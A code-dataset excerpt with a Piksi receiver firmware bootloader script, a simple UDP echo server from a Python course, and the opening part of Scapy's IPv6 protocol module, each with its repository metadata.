from sbp.logging import SBP_MSG_LOG, SBP_MSG_PRINT_DEP
from sbp.piksi import SBP_MSG_COMMAND_RESP, MsgCommandReq, MsgReset
from piksi_tools import serial_link
from piksi_tools.fileio import FileIO
from piksi_tools import __version__ as VERSION
def get_args():
"""
Get and parse arguments.
"""
parser = serial_link.base_cl_options()
parser.description = 'Piksi Bootloader version ' + VERSION
parser.add_argument("firmware", help="the image set file to write to flash.")
return parser.parse_args()
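# Send a MsgCommandReq over the link and wait up to `timeout` seconds, polling
# once per second, for the MsgCommandResp carrying the matching sequence
# number. Returns the device's response code, or -255 on timeout.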
def shell_command(link, cmd, timeout=None, progress_cb=None):
ev = threading.Event()
seq = random.randint(0, 0xffffffff)
ret = {}
elapsed_intervals = 0
def resp_handler(msg, **kwargs):
if msg.sequence == seq:
ret['code'] = msg.code
ev.set()
link.add_callback(resp_handler, SBP_MSG_COMMAND_RESP)
link(MsgCommandReq(sequence=seq, command=cmd))
    while elapsed_intervals < timeout:
        if ev.wait(1):  # poll in one-second intervals; stop once the response arrives
            break
        if progress_cb:
            progress_cb(float(elapsed_intervals) / float(timeout) * 100)
        elapsed_intervals += 1
if len(ret.items()) == 0:
print(("Shell command timeout: execution exceeded {0} "
"seconds with no response.").format(timeout))
return -255
return ret['code']
def main():
"""
Get configuration, get driver, and build handler and start it.
"""
args = get_args()
driver = serial_link.get_base_args_driver(args)
# Driver with context
# Handler with context
with Handler(Framer(driver.read, driver.write, verbose=args.verbose)) as link:
data = bytearray(open(args.firmware, 'rb').read())
def progress_cb(size, _):
sys.stdout.write("\rProgress: %d%% \r" %
(100 * size / len(data)))
sys.stdout.flush()
print('Transferring image file...')
FileIO(link).write(
b"upgrade.image_set.bin", data, progress_cb=progress_cb)
print('Committing file to flash...')
link.add_callback(serial_link.log_printer, SBP_MSG_LOG)
link.add_callback(serial_link.printer, SBP_MSG_PRINT_DEP)
code = shell_command(link, b"upgrade_tool upgrade.image_set.bin", 300)
if code != 0:
print('Failed to perform upgrade (code = %d)' % code)
return
print('Resetting Piksi...')
link(MsgReset(flags=0))
if __name__ == "__main__":
main()
|
swift-nav/piksi_tools
|
piksi_tools/bootload_v3.py
|
Python
|
lgpl-3.0
| 3,528
|
"""
Примитивный UDP сервер.
"""
import socket
UDP_IP = "127.0.0.1"
UDP_PORT = 9999
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((UDP_IP, UDP_PORT))
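# Echo every received datagram back to its sender.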
while True:
data, addr = sock.recvfrom(1024)
print("received message:", data, "from", addr)
sock.sendto(data, addr)
|
park-python/course
|
lectures/06_Internet/udp_echo_server_simple.py
|
Python
|
bsd-3-clause
| 318
|
#############################################################################
# #
# inet6.py --- IPv6 support for Scapy #
# see http://natisbad.org/IPv6/ #
# for more information #
# #
# Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> #
# Arnaud Ebalard <arnaud.ebalard@eads.net> #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License version 2 as #
# published by the Free Software Foundation. #
# #
# This program is distributed in the hope that it will be useful, but #
# WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU #
# General Public License for more details. #
# #
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
from __future__ import absolute_import
from __future__ import print_function
from hashlib import md5
import random
import socket
import struct
from time import gmtime, strftime
from scapy.arch import get_if_hwaddr
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.base_classes import Gen
from scapy.compat import chb, orb, raw, plain_str, bytes_encode
from scapy.consts import WINDOWS
from scapy.config import conf
from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
MTU
from scapy.error import log_runtime, warning
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \
LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \
ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \
X3BytesField, XBitField, XIntField, XShortField
from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
UDP, UDPerror
from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
import scapy.modules.six as six
from scapy.packet import bind_layers, Packet, Raw
from scapy.sendrecv import sendp, sniff, sr, srp1
from scapy.supersocket import SuperSocket, L3RawSocket
from scapy.utils import checksum, strxor
from scapy.pton_ntop import inet_pton, inet_ntop
from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
from scapy.volatile import RandInt, RandShort
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6 # noqa: F401
##########################
# Neighbor cache stuff #
##########################
conf.netcache.new_cache("in6_neighbor", 120)
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""Sends and receive an ICMPv6 Neighbor Solicitation message
This function sends an ICMPv6 Neighbor Solicitation message
to get the MAC address of the neighbor with specified IPv6 address address.
'src' address is used as source of the message. Message is sent on iface.
By default, timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
    res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
               chainCC=chainCC)
return res
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
"""Returns the MAC address corresponding to an IPv6 address
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if isinstance(ip6, Net6):
ip6 = str(ip6)
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff, a, nh = conf.route6.route(ip6)
if iff == conf.loopback_name:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
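# Usage sketch (illustrative; the address is hypothetical). This may emit a
# Neighbor Solicitation if the address is not in the "in6_neighbor" cache:
#
#   mac = getmacbyip6("fe80::ba27:ebff:fe00:1")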
#############################################################################
#############################################################################
# IPv6 Class #
#############################################################################
#############################################################################
ipv6nh = {0: "Hop-by-Hop Option Header",
4: "IP",
6: "TCP",
17: "UDP",
41: "IPv6",
43: "Routing Header",
44: "Fragment Header",
47: "GRE",
50: "ESP Header",
51: "AH Header",
58: "ICMPv6",
59: "No Next Header",
60: "Destination Option Header",
112: "VRRP",
132: "SCTP",
135: "Mobility Header"}
ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
50: "ESP",
51: "AH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt"}
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16 * len(i)
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = tmp_len = None
if self.length_from is not None:
tmp_len = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = b""
remain = s
if tmp_len is not None:
remain, ret = s[:tmp_len], s[tmp_len:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain + ret, lst
def i2m(self, pkt, x):
s = b""
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except Exception:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self, pkt, x):
s = []
if x is None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self, p):
if self.nh == 58: # ICMPv6
t = orb(p[0])
if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
if t == 130 and len(p) >= 28:
# RFC 3810 - 8.1. Query Version Distinctions
return ICMPv6MLQuery2
return icmp6typescls.get(t, Raw)
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
return IPv6ExtHdrSegmentRouting
return ipv6nhcls.get(self.nh, Raw)
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [BitField("version", 6, 4),
BitField("tc", 0, 8),
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1")]
def route(self):
"""Used to select the L2 address"""
dst = self.dst
if isinstance(dst, Gen):
dst = next(iter(dst))
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src, self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
tmp_len = len(p) - 40
p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
return p
def extract_padding(self, data):
"""Extract the IPv6 payload"""
if self.plen == 0 and self.nh == 0 and len(data) >= 8:
# Extract Hop-by-Hop extension length
hbh_len = orb(data[1])
hbh_len = 8 + hbh_len * 8
# Extract length from the Jumbogram option
# Note: the following algorithm take advantage of the Jumbo option
# mandatory alignment (4n + 2, RFC2675 Section 2)
jumbo_len = None
idx = 0
offset = 4 * idx + 2
while offset <= len(data):
opt_type = orb(data[offset])
if opt_type == 0xc2: # Jumbo option
                    jumbo_len = struct.unpack("!I", data[offset + 2:offset + 2 + 4])[0]  # noqa: E501
break
                idx += 1
                offset = 4 * idx + 2
if jumbo_len is None:
log_runtime.info("Scapy did not find a Jumbo option")
jumbo_len = 0
tmp_len = hbh_len + jumbo_len
else:
tmp_len = self.plen
return data[:tmp_len], data[tmp_len:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
return struct.pack("B", self.nh) + self.payload.hashret()
if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
return self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
# With segment routing header (rh == 4), the destination is
# the first address of the IPv6 addresses list
try:
sd = self.addresses[0]
except IndexError:
sd = self.dst
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, ss)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
else:
return struct.pack("B", nh) + self.payload.hashret()
def answers(self, other):
if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
if self.nh in [4, 41]:
return self.payload.answers(other)
if isinstance(other, IPv6) and other.nh in [4, 41]:
return self.answers(other.payload)
if isinstance(other, IP) and other.proto in [4, 41]:
return self.answers(other.payload)
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
# ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
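# Quick sketch (illustrative): 'plen' is filled in by post_build when left
# to None, e.g.
#
#   p = IPv6(dst="2001:db8::1") / UDP() / b"data"
#   IPv6(raw(p)).plen  # -> 12 (8-byte UDP header + 4 payload bytes)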
class IPv46(IP):
"""
This class implements a dispatcher that is used to detect the IP version
while parsing Raw IP pcap files.
"""
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
if orb(_pkt[0]) >> 4 == 6:
return IPv6
elif kargs.get("version") == 6:
return IPv6
return IP
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # < Basic case
(ss == os and request_has_rh)):
# ^ Request has a RH : don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = raw(selfup)
s2 = raw(otherup)
tmp_len = min(len(s1), len(s2))
res = s1[:tmp_len] == s2[:tmp_len]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = raw(selfup)
s2 = raw(otherup)
tmp_len = min(len(s1), len(s2))
return s1[:tmp_len] == s2[:tmp_len]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
# Upper Layer Checksum computation #
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [IP6Field("src", "::"),
IP6Field("dst", "::"),
IntField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0)]
def in6_chksum(nh, u, p):
"""
As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
Performs IPv6 Upper Layer checksum computation.
This function operates by filling a pseudo header class instance
(PseudoIPv6) with:
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
:param nh: value of upper layer protocol
:param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
:param p: the payload of the upper layer provided as a string
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u is not None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[0]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = raw(ph6)
return checksum(ph6s + p)
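# Usage sketch (illustrative; addresses are examples): computing a
# UDP-over-IPv6 checksum by hand. 'u' must carry its IPv6 underlayer,
# which is why the full packet is built first (17 is UDP's next-header
# value):
#
#   p = IPv6(src="2001:db8::1", dst="2001:db8::2") / UDP(dport=53)
#   cksum = in6_chksum(17, p[UDP], raw(p[UDP]))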
#############################################################################
#############################################################################
# Extension Headers #
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPv6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
# IPv6 options for Extension Headers #
_hbhopts = {0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option"}
class _OTypeField(ByteEnumField):
"""
    Modified ByteEnumField that displays information regarding the IPv6 option
    based on its option type value (i.e. what nodes that process the option
    should do if they do not understand it).
    It is used by the Jumbo, Pad1, PadN, RouterAlert and HAO options.
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route"}
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from=lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
        As specified in section 4.2 of RFC 2460, every option has
        an alignment requirement, usually expressed as xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.
        This function is given the current position from the
        start of the header and returns the required padding length.
"""
return 0
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt:
o = orb(_pkt[0]) # Option type
if o in _hbhoptcls:
return _hbhoptcls[o]
return cls
def extract_padding(self, p):
return b"", p
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
def extract_padding(self, p):
return b"", p
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from=lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
def extract_padding(self, p):
return b"", p
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message", # noqa: E501
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved"})]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
# TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
# TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2
y = 0
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None)]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4
y = 2
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::")]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8
y = 6
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
_hbhoptcls = {0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO}
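# Worked example of the alignment formula above: HAO has an 8n+6
# requirement, so at curpos=2 inside the header its alignment_delta() is
#   8 * ((2 - 6 + 8 - 1) // 8) + 6 - 2 = 4
# i.e. four bytes of padding (a PadN option) precede the HAO option.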
# Hop-by-Hop Extension Header #
class _OptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, *args, **kargs):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, *args, **kargs)
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except Exception:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00' * (d - 2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00' * (d - 2)))
return s
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], HBHOptUnknown, 2,
length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
overload_fields = {IPv6: {"nh": 0}}
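# Build sketch (illustrative): with autopad on (the default), the options
# block is padded to an 8-byte boundary, so a lone Router Alert option
# should get a two-byte PadN appended automatically:
#
#   h = IPv6ExtHdrHopByHop(options=[RouterAlert(value=0)])
#   raw(h)  # expected: b';\x00\x05\x02\x00\x00\x01\x00'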
# Destination Option Header #
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], HBHOptUnknown, 2,
length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
overload_fields = {IPv6: {"nh": 60}}
# Routing Header #
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
IP6ListField("addresses", [],
length_from=lambda pkt: 8 * pkt.len)]
overload_fields = {IPv6: {"nh": 43}}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
# Segment Routing Header #
# This implementation is based on RFC8754, but some older snippets come from:
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
_segment_routing_header_tlvs = {
# RFC 8754 sect 8.2
0: "Pad1 TLV",
1: "Ingress Node TLV", # draft 06
2: "Egress Node TLV", # draft 06
4: "PadN TLV",
5: "HMAC TLV",
}
class IPv6ExtHdrSegmentRoutingTLV(Packet):
name = "IPv6 Option Header Segment Routing - Generic TLV"
# RFC 8754 sect 2.1
fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
ByteField("len", 0),
StrLenField("value", "", length_from=lambda pkt: pkt.len)]
def extract_padding(self, p):
return b"", p
registered_sr_tlv = {}
@classmethod
def register_variant(cls):
cls.registered_sr_tlv[cls.type.default] = cls
@classmethod
def dispatch_hook(cls, pkt=None, *args, **kargs):
if pkt:
tmp_type = ord(pkt[:1])
return cls.registered_sr_tlv.get(tmp_type, cls)
return cls
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
# draft-ietf-6man-segment-routing-header-06 3.1.1
fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("ingress_node", "::1")]
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Egress Node TLV"
# draft-ietf-6man-segment-routing-header-06 3.1.2
fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("egress_node", "::1")]
